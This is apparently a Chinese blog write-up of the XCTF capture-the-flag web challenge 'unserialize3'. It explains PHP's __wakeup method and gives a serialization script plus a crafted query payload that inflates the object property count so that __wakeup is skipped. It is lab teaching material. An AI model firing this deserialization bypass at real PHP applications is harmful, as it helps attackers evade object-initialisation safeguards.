攻防世界: WEB——unserialize3

靶场内容

  • 题目:反序列化——说明和反序列化有关
  • 打开靶场:PHP代码——PHP反序列化image

solution

这个靶场出来之后,显示出来是一个不完整的PHP代码——括号都没有完全闭合
开始分析:

  • __wakeup()属于魔术方法,通常用于反序列化中。
  • unserialize() 反序列化函数会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源,比如连接数据库。
  • 这题到目前的代码是没有看见序列化函数的,所以我们传递参数的时候是需要自己传递已经序列化的参数,题目也给了提示,是传参给code
  • 使用一下代码可以产生序列化输出:
<?php
class xctf{                    
public $flag = '111';            
public function __wakeup(){     
exit('bad requests');
}
}
$a = new xctf();          
echo(serialize($a));       
?>
  • 构造出对象的序列化输出:O:4:"xctf":1:{s:4:"flag";s:3:"111";}
  • 根据代码审计,我们构造出来序列化序列之后,不能给__wakeup()执行,否则会返回bad request参数,所以需要在序列化参数做些修改。image
  • 这里的漏洞就是:如果我们在序列化中说明的对象个数要比实际的对象个数要大,那么将不会执行__wakeup()这个方法
  • 所以,我们将序列化输出的对象个数改成比1大的数就行了
  • 比如:?code=O:4:"xctf":3:{s:4:"flag";s:3:"111";} flag就出来了image
  • 也就是证明,我们的序列化参数真实传递给了$code
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值